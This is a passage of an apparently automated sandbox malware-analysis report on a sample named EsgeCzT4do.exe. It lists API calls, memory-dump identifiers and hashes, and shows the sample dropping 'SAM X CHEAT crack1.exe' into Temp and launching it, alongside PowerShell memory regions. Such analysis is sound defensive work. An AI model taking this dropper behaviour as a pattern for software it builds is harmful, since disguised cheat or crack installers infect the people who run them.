                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: 284444f2568d96eb5f499d391233f43a2f88d41ae364e0567807da02f849ec1b
                                                                                                                                                                                                                                                                                      • Instruction ID: 765017f4a7fe1763b93213a0743e5224a7b8bf10e0e2635d7465f91e9f3f1348
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 284444f2568d96eb5f499d391233f43a2f88d41ae364e0567807da02f849ec1b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5116D71500218BFDF215F51DC81E9B7669BB84365F00803AFA08792A1C37C49518BEE
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024F2
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?, C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,00000000,?,?,00000000,00000011), ref: 00402511
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe, xrefs: 004024E0, 00402505
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWritelstrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe
                                                                                                                                                                                                                                                                                      • API String ID: 427699356-3984678786
                                                                                                                                                                                                                                                                                      • Opcode ID: a377c6a4200a474e6a32261d3e4bcfd287ddd4d49762008875a719c727f93f40
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d0466e2475190dcbeea98c473c6ee3349c22a30d2c03acad583e8792e536618
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a377c6a4200a474e6a32261d3e4bcfd287ddd4d49762008875a719c727f93f40
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEF0E972A44244BFEB10FBB19E09EAB3668EB50309F14443BF142F51C2D6FC5541966E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0C8,Error launching installer), ref: 00405426
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405433
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405414
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                      • Opcode ID: 0925aebfc32c6642fbbb941080814cd4d7ece6f22c8f43fc911f16656fd02ce2
                                                                                                                                                                                                                                                                                      • Instruction ID: 8ba2d39aa234bef1b68f753dd4085f5a0355ab0b72bc814b33162f1b9dafcc5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0925aebfc32c6642fbbb941080814cd4d7ece6f22c8f43fc911f16656fd02ce2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E0E675A00209ABDB109FA4DC45A6F7B7CFF10305B404521E914F3151D774D5148A6D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403537,00403340,00000000), ref: 00403579
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403580
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403571
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                                      • API String ID: 1100898210-823278215
                                                                                                                                                                                                                                                                                      • Opcode ID: 84b733c7cccae0041813714216a38e771799edba4f139ceaa0c0671ece6e2eb2
                                                                                                                                                                                                                                                                                      • Instruction ID: bfe74e10b2793f4584c914afcf2a54bd359ebf4cfcfa0dffde5489d6b194198f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84b733c7cccae0041813714216a38e771799edba4f139ceaa0c0671ece6e2eb2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE08C32901030A7DA211F15BC0475ABB6C6B49B32F01456AE801772B083742D424BE8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CA4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\EsgeCzT4do.exe,C:\Users\user\Desktop\EsgeCzT4do.exe,80000000,00000003), ref: 004056E1
                                                                                                                                                                                                                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CA4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\EsgeCzT4do.exe,C:\Users\user\Desktop\EsgeCzT4do.exe,80000000,00000003), ref: 004056EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                                                                      • API String ID: 2709904686-1246513382
                                                                                                                                                                                                                                                                                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                                                                                                                                                                                      • Instruction ID: 3f11d7040b39dee88ccc87d096f3af91d58a3172f7b65643d8c2c66232cec6f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADD0A76280ADB01EF30352108C04B8F7A58CF13300F0948A2E040A21D1C6B85C418FFD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059FB,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057F4
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040580D
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059FB,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405824
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                                                                                                                                                                                                                                      • Instruction ID: 9d1965df737bf6a3caf75c2c412474092f11d9bf319c7f7f540ae1764f3f27e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0A737209D51ABD202AB255C04D6B7FA4EF91314B14447AF840F2280D779A925DBBB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2435028424.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B"I$(B"I$(B"I$(B"I$(B"I
                                                                                                                                                                                                                                                                                      • API String ID: 0-3570690463
                                                                                                                                                                                                                                                                                      • Opcode ID: 35ccd5d9f19198625a4402878b64ec1455b1a4781ff59fe6dd0a741b12e35853
                                                                                                                                                                                                                                                                                      • Instruction ID: 5dca4cd9f60c19e676755dcec502a6e619e85676bbf9f8c75be83b3e53ef655e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35ccd5d9f19198625a4402878b64ec1455b1a4781ff59fe6dd0a741b12e35853
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AD17331D0EA8A5FE799EB2858155B5BBE0EF15790F1801FED14ECB0C3EA1CA801C796
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2433277972.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 87cf1f550efac5a764f3c122aeb13def10f945031bfed601184048030a45d6b9
                                                                                                                                                                                                                                                                                      • Instruction ID: 7854a52ed52eaf809180b12beb25782ade77059ccccb23d33c2c1141fdb27d6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87cf1f550efac5a764f3c122aeb13def10f945031bfed601184048030a45d6b9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16115E7690E7C84FD753AB3898690947FB0EF93251B0D01EBD488CB0A3EA584C49C7A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2433277972.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 00bda240abafda259ab4a6526947141ec0cd7ed8003a19283314ab41a6bd81fb
                                                                                                                                                                                                                                                                                      • Instruction ID: 60cd830c1907856883791a2398d4a94bb7ccfb119772d3d3bef73738f4350d4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00bda240abafda259ab4a6526947141ec0cd7ed8003a19283314ab41a6bd81fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC41EA31E0CA488FDB58AF1CAC066F97BE1FB65710F00412FE449C3292DB64A85A87C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2431179311.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848ded000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3833db6cb93b72b4432542b6e081b3e1bc3122217442a04dc53b1b7025ddb609
                                                                                                                                                                                                                                                                                      • Instruction ID: 932b5f98c10724940e58b67899a19353ec1506585068a3375e5a41a6d1b7f12d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3833db6cb93b72b4432542b6e081b3e1bc3122217442a04dc53b1b7025ddb609
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741227080EBC44FE7569B289845A623FF0EF52311F1505EFD088CB0A3D729A80AC792
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2433277972.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 25b5892b9a25593acfa93094a608a56566ec4d26fee69e3633ddf49f4f768e03
                                                                                                                                                                                                                                                                                      • Instruction ID: da12b8f40c0ee6c6cfd962171e51fa02425000fd74cded564684542b546ab66f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25b5892b9a25593acfa93094a608a56566ec4d26fee69e3633ddf49f4f768e03
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721387080C7884FE709DB689C4A6F97FF4EB53320F04415AD445D7193DA785846CB61
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2435028424.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: aec972f89bcb13b31fc45f5522c5a51d3cccbcd01ee57c5d412c2e1e1291957f
                                                                                                                                                                                                                                                                                      • Instruction ID: e5f230cbe57ccb8e904675167aa20765d686054574c916f39e0694ef46ec4e89
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec972f89bcb13b31fc45f5522c5a51d3cccbcd01ee57c5d412c2e1e1291957f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F111CE32B0C9089FDB59EB0CE4419E873E1EFA8360B1400BBD10AC71A2DB25EC42CB84
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2435028424.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 8a1e7bc9a4c00b9b39919b1c467fb342b52c45471678e432fdc6442f01e531a1
                                                                                                                                                                                                                                                                                      • Instruction ID: a4bd3f0a9719f8f507da1914149b65b7ccaad334b0b4a09ee600858b8ef6dba5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1e7bc9a4c00b9b39919b1c467fb342b52c45471678e432fdc6442f01e531a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A118E32B0C9088FDB94EB0CE4459E8B7E1EF55364B5400ABD10AC71A3DB25EC55CB94
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2433277972.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                                                                                                                                                                                                                      • Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2435028424.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 629a2d3826c5bc0f67193b03fb8ed955c1e787dc05f2800b3fd21c6531dc9fa7
                                                                                                                                                                                                                                                                                      • Instruction ID: 88fdf8e7ea0fc7c33b496b0d36b6f0e03b60cb8e5cd9e745fd0d410bb444d6e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629a2d3826c5bc0f67193b03fb8ed955c1e787dc05f2800b3fd21c6531dc9fa7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0BE32A0C6058FD76AEB0CE4048A8B3E0FF65360F1500BAE15EC71A3DB26EC408B49
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2435028424.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6b7c74138f85178704f983d364f7727f4f911aac42f8e234cbb65181c2388f7d
                                                                                                                                                                                                                                                                                      • Instruction ID: d0c9f2bb86f183dfa6987e30c79df2c98803fc3b66d0e054fb31facefa27a32e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b7c74138f85178704f983d364f7727f4f911aac42f8e234cbb65181c2388f7d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FF0BE31A4C5448FD754EB0CE4448A8B3E0FF06320F0500B6E14EC70A3DB26EC908B54
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000009.00000002.2433277972.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ff848f00000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: O_^4$O_^7$O_^F$O_^J
                                                                                                                                                                                                                                                                                      • API String ID: 0-875994666
                                                                                                                                                                                                                                                                                      • Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bd8163f0f9ae516a15f916a4231b8f7fb71d175f1a7c6e4fa1c9a0ae69dd810
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E521297762A025DED3417B7DB8045DA3750DFD427AB4502B2D19E8F243EA1C708686E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
